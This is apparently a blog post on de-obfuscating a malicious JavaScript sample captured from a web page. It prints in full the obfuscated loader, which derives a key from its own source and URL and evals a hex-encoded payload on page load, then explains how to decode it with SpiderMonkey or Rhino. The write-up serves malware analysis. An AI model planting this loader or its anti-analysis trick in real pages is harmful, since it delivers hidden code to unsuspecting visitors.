de-obfuscate javascript

Content of err68.com/cgi-bin/index.cgi?ad

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/x
html1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
/*
 * Analyst annotation (not part of the captured sample). It is placed before the
 * `function` keyword, outside the text that arguments.callee.toString() covers.
 *
 * TC76Lp8Ij(u5U3T2i68, hDMdS30g0): self-keyed decoder and launcher.
 *   u5U3T2i68  hex string, two hex digits per encoded byte.
 *   hDMdS30g0  never read in the body.
 *
 * Steps, in order:
 *   1. Take the function's own source text via arguments.callee.toString(),
 *      append location.href, strip every non-word character (/\W/g) and
 *      upper-case the result.
 *   2. Build a 256-entry table from the constant 3988292384 (0xEDB88320, the
 *      reflected CRC-32 polynomial) and run a CRC-32-style checksum over the
 *      string from step 1; the initial value and the final XOR are 2^32 - 1.
 *   3. Format the checksum as 8 upper-case hex digits, left-padded with "0";
 *      the character codes of those 8 digits form a repeating key.
 *   4. For each payload byte, subtract the current key byte (adding 256 when
 *      the result is negative) and append the resulting character.
 *   5. Pass the decoded string to eval, held in the alias u3tNKdtVT. If that
 *      throws, assign "/" to window.location; an error from that assignment
 *      is swallowed.
 *
 * Consequence for analysis: in engines whose toString() returns the source
 * text, renaming an identifier or adding a comment inside the body changes the
 * checksum and therefore the key, as does a different location.href.
 * Whitespace and punctuation are removed in step 1, so they do not affect it.
 */
function TC76Lp8Ij(u5U3T2i68, hDMdS30g0){var P47f3CN2i = arguments.callee;P47f3C
N2i = P47f3CN2i.toString();var J7gkdyNgd = 4294967296;P47f3CN2i = P47f3CN2i + lo
cation.href;var fkGa56HKA = 1;var u3tNKdtVT = eval;var QSMcPtYj8 = P47f3CN2i.rep
lace(/\W/g, "");QSMcPtYj8 = QSMcPtYj8.toUpperCase();var g16QBGfU3 = new Array;fo
r(var X0d2KMFf1 = 0; X0d2KMFf1 < 256; X0d2KMFf1++) {g16QBGfU3[X0d2KMFf1] = 0;}fo
r(var X0d2KMFf1 = 128; X0d2KMFf1; X0d2KMFf1 >>= 1) {fkGa56HKA = fkGa56HKA >>> 1
^ (fkGa56HKA & 1 ? 3988292384 : 0);for(var Vi47667NA = 0; Vi47667NA < 256; Vi476
67NA += X0d2KMFf1 * 2) {var Yr6g1158R = X0d2KMFf1 + Vi47667NA;g16QBGfU3[Yr6g1158
R] = g16QBGfU3[Vi47667NA] ^ fkGa56HKA;if (g16QBGfU3[Yr6g1158R] < 0) {g16QBGfU3[Y
r6g1158R] += J7gkdyNgd;}}}var QY6gqwC7F = J7gkdyNgd - 1;for(var bA6sdB4e6 = 0; b
A6sdB4e6 < QSMcPtYj8.length; bA6sdB4e6++) {var fIRV5C78P = (QY6gqwC7F ^ QSMcPtYj
8.charCodeAt(bA6sdB4e6)) & 255;QY6gqwC7F = (QY6gqwC7F >>> 8) ^ g16QBGfU3[fIRV5C7
8P];}QY6gqwC7F = QY6gqwC7F ^ (J7gkdyNgd - 1);if (QY6gqwC7F < 0) {QY6gqwC7F += J7
gkdyNgd;}QY6gqwC7F = QY6gqwC7F.toString(16).toUpperCase();while(QY6gqwC7F.length
< 8) {QY6gqwC7F = "0" + QY6gqwC7F;}var eJ0GVtcO5 = new Array;for(var X0d2KMFf1
= 0; X0d2KMFf1 < 8; X0d2KMFf1++) {eJ0GVtcO5[X0d2KMFf1] = QY6gqwC7F.charCodeAt(X0
d2KMFf1);}var mqYk7RNjq = "";var Aqp4XOS5s = 0;for(var X0d2KMFf1 = 0; X0d2KMFf1
< u5U3T2i68.length; X0d2KMFf1 += 2){var Yr6g1158R = u5U3T2i68.substr(X0d2KMFf1,
2);var j5c6Np1Jm = parseInt(Yr6g1158R, 16);var Yb4p1F45c = eJ0GVtcO5[Aqp4XOS5s];
var y2YW6HA6a = j5c6Np1Jm - Yb4p1F45c;if(y2YW6HA6a < 0) {y2YW6HA6a = y2YW6HA6a +
256;}mqYk7RNjq += String.fromCharCode(y2YW6HA6a);if(Aqp4XOS5s + 1 == eJ0GVtcO5.
length) {Aqp4XOS5s = 0;} else {Aqp4XOS5s++;}}var bRvlXu1au = 0;try {u3tNKdtVT(mq
Yk7RNjq);} catch(e) {bRvlXu1au = 1;}try {if (bRvlXu1au) {window.location = "/";}
} catch(e) {}}
//-->
</script>
</head>
<body onload="TC76Lp8Ij('A9a7A59BBA9fA7A263986F6e7c6caca6B5745f9a8B6dadA19265AE9
172567B6A7A76aa7d8fab895DBEA898AA66A4A4767A77676a9eA658716393a99fbbA39DA2B7a5659
Ba7A2a499a86Da5a4886d7d64758AA7588356A6A085697c68788EA862B7a18aACb89fa69b6b5B72a
eA7A8588C73A2887Bbd6baf88636f576C786F6C6D796969717c71a6a085697c68788ea8548052A5a
4886d7D64758AA7587156a4A3a693ABa1b5A4669Cb5979d73BC97AA5484846e6C7b7Baf68b552745
87771ae95b552A86AB4a07e769369825883569daaA49e72aeA7a8587EA4947A6db87C8666636f57a
6b2786F7973648fA874a89da4af939a9D6e65948B729963586858616f8D93997B7BA87E827552745
890979A7778A47d867864aca398A2A79Db87999A7A85A6073bc97AA54976483A89d6b6e669152745
8B49Baf5484a4a999BF719Ea3b55aad99B856999dB079A46F7D6b9C54805267736697a1a18a9f6e6
f7B9a587063646c6E8156999DB079a46f7D6b9c5F6e5b57b39a6884A49a676D6A9491999db079a46
F7D6B9c91636F576881b39EA3b55aAD99B856999Db079A46f7d6b9C548052686a7e715895AC9f7ea
57D6D6d987E5298A1B37da56B7A679B5884747554745B57b387886F687877AE6cB856755484846E6
c7b7bAF68B552757684566954a1525f79986D6c6988a96Baa665C58656371576B7f6E70667c646a7
07a567254735b729eB5a860aaa4A45787b969a878AA667E6E667358647e5286ab79A67C9B77796D5
882566A69796D5787b969A878AA667e6e66617554a49bA47FB36d6f69A7526158785F58afB993A95
895986B6674977a8A78567554A49bA47fb36D6f69A752625895a96bA487996b7f7c718c668FA28E6
D7c68868F92946A6a779B7B86758F5775668a6a80B3896C6E78849383b665A77cad6A7F6aa052955
887886F687877ae6CB871a19A635A8b6a92a68f697964859395986b6674977a8A789358706362605
8C18a6A80B3896c6E78849383A5656969AB798A66a0526275668E68a49475ae6DBD8a73b1c0AFAD9
9B856AE9ebc86787B8D68685480528F68b6877Bab78A98b587356696Fa9a1a960bc97AA548765678
d779f6a7bAF5274587671587876628c69AF687FA0636E5782a7987b69B578856a74A29dA2AAa69F7
3667a6b649863a06a8DA2635F6c52b2aeA7a858A497aa9Eab7e7BB17A636F5760BCa0b18884757E6
a765696548D93997b7ba87E8275609aA0a7A87bA3a79778AC6e7a6B649863A06a8DA2615d6358576
a7B6b73aaADab8B79897D6a64636f5760bcA0B18884757e6A7656767281526F6166945888757eA78
f7b6C6a829Ea28BB0ADA97079bc789473c3ACa2AD97737a7F7866587163a8A1B19A777B7B7562579
6665e9064B3837AAF7bad8C5470526861819f9E546ba8A1B19a777b7b7562577466666154beA8a1b
19A777b7b7562576383569064B3837AAF7bAD8C6Fc0a8A1b19a777b7B7562577566acA2AD97737A7
F786666A8B285abaaAFA49F5C74686066baa58Da4b397a97bA7A99D5c6C6DAEa0afa29D5CB99cB08
c87797f667360a39DB49DAC9c636E57706F56b3aaadAB8b79897d6a64636F575A7658585f63A8A1b
19a777b7B756272B5bc97AA54a978687Ea97C7b84a7527458B49bAF5484a4A999BF719EA3b55Aad9
9b856999dB079A46F7d6b9C54805267736697a1A18A9F6E6f7b9a5870636A7258a79FA57bb0696E6
DAA61635D63AD9d7E777c9b7A86829B93A79fa57BB0696e6Daa93587163A8A1b19a777B7b7562659
Bae97aa77B2969C79BA5e999dB079A46F7d6B9C5D7eAFAD99b85690AB7889a66f8977A2548052595
a81ac99a66387688C9F887b95889f57756666739ab2a45faea7a85895AC9F7ea57D6D6d98636F576
88156999DB079A46F7D6b9c547f52997D7dabA58376A99066b29Ba69Bb79a7258A79fA57bb0696e6
Daa566371636460B3BC97aa5492946A6A779B7b8675527458a87B6FA9B0816aAF9F64aba9a5a5ABA
A6E97A1a18A9f6E6F7B9A6454755B72aea7A858A57A6A9fb177A76cA8636F57A8A7A8AB998ca0AB6
095986b6674977A8A78625865795B72aea7a8588B897E6f7b8E8C9A7C636f579E8C677e978975879
CA18b69889C847A998ba3956Fb993a958978D9e787667686c7B567554b4696fA0BF67a968B752645
89D7C846C867a8d9a8E71a19A6B838E9e8A696D657767577466666154be838E9e8a696D657767577
566878f9A87656c697a6B585f63646C6e81B390ab7889a66F8977a2546e6F578bBAA8a1a2AA609DA
AB5a37B9CA4a47AA7AA9b60859A987b6b7b676C696c6da09E6E8b69889c847A998bA3585F6363577
583569e7a74789a7E89869C62af97A59Fba9E6154BE87688C9F887b95889f5775666673B16397a3a
bAB56b3897486908a89977Da16e5d72B5c3AC99A663748ea98980A37B777f5775666673a8b5ab57B
3B768A69E8974876F915E90ab7889A66f8977A25D7eaf579bA7AA9b9c6B976058C1788fA5867Ca27
F7a835871636372B5BAa8B154BE9b9d586E788fa5867cA27f7A836154bea9A0a6AAA5AF62AFa19A9
9ba9fa7A2636f575a755873b1c0529a99ba99a05cA85B57b3c3b3429a7b686d6ebaa8aa766b59787
988667167A56A78687f78996585676E6c7F6c716CA467786F7E6D9968A594796b7C676E7879656D6
C7d676c6477947879a8667167a56a98687F78796585676E6C7f786E67A5656D6B877870778464999
E7C676e7879656d6c7d676C6477949899a8667167a56a98687f989965A5676E6c7E9b70677B696E7
D7F7b7066A565999C7C676E9879656d6C7d676C6477746C6b7a78716D846b6c6B7b7b6D688467996
da76a9969A5627070A76a996b79986f9B7D9771967B966f7b7C6C706C84676D9E7C67797678626a7
C7A696B98a569986FA8696d647c63787a7C6f99968478787E7f6B70667a776B687a66796d8464797
07C676F657B986E71876f70697C6b7069876B6D647B626C6b876A7168A569787e876E71658569786
aA76E6e65a464996EA8676F9884757869876B79697C69787aA8699967a495986aa76A6e9977776c6
8a86D7165A5676C6b7e676f6B8574796e7F666e6c7C6A6e997B6c6f6479636e6B7D686b987796987
17F6d99697963986fA76871997c696E717e6C6E75846A6d6E7d9b6d6479676D6b7C6d6D697A756C6
b7A786B98777678797f7b7197a496989a7C6F6D6c7b976E6Fa86699677c626e7D7F6C6f6B79656E6
87b6c6f687B766f9bA86A70667c946e7d7F976e65a493796c876B716985746F6a7f996d7679656F6
97f6A706479676c9e7B6c6f997b679a68A8676F7a7A746f707d9A6d997A646D7E7c976D6479666e6
87b6c6E647a646D7e7c67797678626a7c799c996DA46499707C677065846B6f6f7E9899688567706
8A76B6D647b626c6B7D6d6f7a7B6999717F69706C7B77706f7c6A716a846B786fA8696F65a5696c9
A7E676F6b8574796E7F666e6C7c6A6E797c676E6a79736f697A7B6B9578626A9c799c7197A4696D6
E7c6F7065A46B6F6F7E987968A5677068876B6d647b626E687B6c6D697a646d707c976B7877966A9
b799c71688464996c7F6b6f6a7C656D997F9a6D677A976d6e7C696E647A676C6D7D676c6477746B9
e876c7197856870707B6C7197A4696D6e7C6f7065A46B6F6f7E98796885677068876B6d647b626E6
87b6c6D697a656D707c976b9877966A7B797C7168a464996C7F6b6F6a7c656d797F7A6D677A776D6
E7c696E647a686C6d7D676c6477746b7E876c7177856870707b6c717784696d6E7C6F7065a46b6F6
F7e78996885677068A76B6d647b626e687B6c6D697A666d707C776B9877966A7b797c7168A464996
C7f6b6F6a7C656D797f9a6d677a976D6e7c696E647a696C6D7d676c6477746B7eA76c7177a568707
07b6c719784696d6E7c6f7065846B6f6F7E987968A5677068a76B6d647B626E687b6C6D697A676D7
07c976b7877766A7b799c7168a464996C7F6B6f6a7C656D797f7A6d677A976d6E7C696E647A6A6c6
d7D676c6477746B7eA76C7197a56870707B6c719784696D6E7C6F7065846B6f6F7e7879688567706
8876b6D647B626E687b6c6D697A686D707C776B7877766A9B797c71688464796c7f6B6f6A7C656d7
97F9A6d677A776D6E7c696e647A6B6C6d7d676C6477746B9eA76c7197856870707B6C7177A4696D6
E7c6f7065846B6f6F7E98996885677068a76B6d647B626e687b6c6D697a696d707c776B7877766A9
b797c7168a464796c7f6b6F6A7C656d997f9A6d677A776D6e7c696e647A736C6d7D676C6477946C6
B7A986b6dA49570717B6C6D76A464986f877C70687b6B6F6b7C7a717579636D6f7d9b6d6479676d6
b7c6D6D6979936c6b7A986B6D7795706d876E716c846479697d796B78779699687a696B9877776C6
8a797716A79656C7a7f6D7168847870797e6D70647a9370997b6c6f647A776d6e7C696E647A666C6
d7B6c6d6D79696d6E7e686F977B6B986E7E6e70967B9598997c7c716da563706F7f9879767C62787
b7C6f6D667C6770708768716ca4649971a76C6D647B68706c876a716BA4937879a7687968846A6C6
d7C686d677A636d9e7C676d657b626c6b7C696E6879936C6b7a986B6Da466706C876A706B7B69706
e7d6E716B79656E687B6c6D697a636E7d7c696E7678626A7c7A696B7877776c68886d716585676c6
b7E6d7978A4979A687f6b6F988466707B7B6c6F647963996C8768996A847570797F6D796bA562797
07C7c9967a595986ea797716ca497706A87687179847378707F6D717584686e6Ca86A9969A467986
E87777969796B6e6E7C7A6D647A666D6b7B9C6e9977776c68886d716585676C6B7d996f6C7c6B6F9
Ca868716B7A676F717B6C6f6479636d707C696E7678626A9c7A696b9877976C68A76d719a85676C9
A8779716885656D6e7E6e70648576707e877b79777A73786F7D9B6E647A976e997E6c79788476797
da8976e6D84666D9E7E6D797884779a687f6B6f988466707B7C6A719a8468796C876E9968a4946D9
D7D7A7067a594796Aa86F996d7a75706C7c676D9979936d6Ea8996B7877766a9b7E6d706685686E6
F7d686E647b6b6E6c7b6c6F647963706fA8987178a5966F6F7E697168a4936E6Ca76a716C8466786
D7D6F7966a467787a7E68796879746E997e6c99988476797Da8976e6D84666c7B7C6a996Ba562707
1886b9966847578697F9A6D767A646E9B7c776e9678626A9C7A696b787773787Ea76D6D6479746f6
c7e6b996C7A646e6F7d676F6a7B666C6b7D686D677A656d7e7a7B6B9577956a9B7d996f6C7c6B6f7
c8868716b7A676f717B6c6D997A776d6E7c696e6479676d9d7A696B9877776c687a776F6A7b6a6f7
A7d7A7968a46a6e707f6d6D6479976e687b6C70687c62999a7d686E657a656E717d6d6E7977976C6
8887b6b9877966b687A669995A46b787Ea79A716979946e717D9870967b6a996FA76e6e667C6b6D6
98768716c8478989ca86B716C79656d9e7B6C6e697a636D9E7a7B6b7577956e717D7870767B6A796
f876E6E667C6B6c6B7c676f6479636D707d676e6479676d9d7a696b7877976c687A9B6b75856b706
cA76e6D677b78797d7d6A796cA563709b7e97706979636f6b7C677165846678697e976F6d7C636e9
Ca76E6D6479976c6b7d796f6C7c6b6f9Ca868716b7A676f717d676C647774797B876879667965986
e7D7c996D7c6A787b87686f787C696C6B7D696d67A467796d876a9969A5627070876A796b7978787
1A86971698466986f7f986f6cA496787A877b71698563786f7B9B6d69a56678718869716D8565786
F7b6e6D777a956c6B7A9879677B7578717e9A716d8464706b7F6b6D998568707087776f68a567999
9A869716d846798708777716c796b6d70886B796d856570707b6E6D9a79636d70886b7169A594786
F7c6b7178A464797BA7687967a468786d7f9c996785676d707C776e7678626a9cA76F6f77A569709
ca76D71657c626F6f7C6a796AA46879797e687968A569786d7F9C7169A5689999876c6d6C7967786
eA76e716a79656E6A7c676D66a494986FA79779677a946e6D7D667169A567786d7C996e967998987
1886671987a64706E7f7a719779979870A79771997a64707B876A716b8468797d7C7c71678473707
b7D6b716D84696e79876a6E6D7A956D7A7C986E677A646e6E7D67716a7a656d717C6C6e677A636E9
c7D6E71697A6570707f976e6c7a6b6E6E7D6D6E647a656d6B7C6c6e677A636e6e7d676e647a67706
D7c9A6E6784656E6F7D677165846670717F996D6979636e697C676F9985746D6ea79b7965a493707
97F696D6d7a776B687a66716B85629871886c7178a46a786987776e658465996d876B996D7a63706
ca76C9967A468796cA76B6F67A494709B8768716b796B99717e77796a7c7370717F6d70647C676D7
e7D796b78777699687a696b986A5B72')">

</body>
</html>

ok ok….just change the smiley face to “8)”

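How can the above be easily decoded? The difficulty lies in the self-checking mechanism in the function, which prevents modification: the function reads its own source text (arguments.callee.toString()), appends location.href, and derives the decoding key from a checksum of the two. Changing the function's code, or running it under a different URL, therefore gives a wrong key and garbage output.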

The tool you’ll need is either spidermonkey or rhino from mozilla.
Edit the above content of the javascript by doing the following steps:

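  1. Remove all html code to just have the javascript portion. The listing above is hard-wrapped, so rejoin the lines, and keep the TC76Lp8Ij('…') call from the body onload attribute as a plain statement at the end of the script
  2. Prepend the javascript to define eval function as print (place it before the function, not inside it, so the function's own text stays unchanged)
  3. Prepend the javascript to define the location.href variable, set to the exact URL the page came from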

For eg,
// Analysis stub for a standalone JS shell (SpiderMonkey or Rhino), where print() is available.
// Shadowing eval makes the sample write its decoded stage out as text instead of running it.
function eval(a) {
  print(a);
}

// The sample folds location.href into its decoding key, so this has to be the
// exact URL the page was served from.
location = { href: "http://err68.com/cgi-bin/index.cgi?ad" };

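Executing the modified script with spidermonkey prints another javascript, obfuscated in a similar way.
Just repeat step (2) and (3) above on the output.
After executing you will get the final decoded version. If what comes out is unreadable, the key was wrong: check that the function body was not altered and that location.href is exactly the original URL.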

For those who, in moments of insanity, might want to attempt to de-obfuscate JS in windoze platform, one tool to use is FileInsight.

One Response to “de-obfuscate javascript”

  1. […] As can be seen from the content it opens a website topsoftwaresale.com. but embedded is an iframe from err68.com/cgi-bin/index.cgi?ad The content of the iframe how to decode it can be seen here. […]
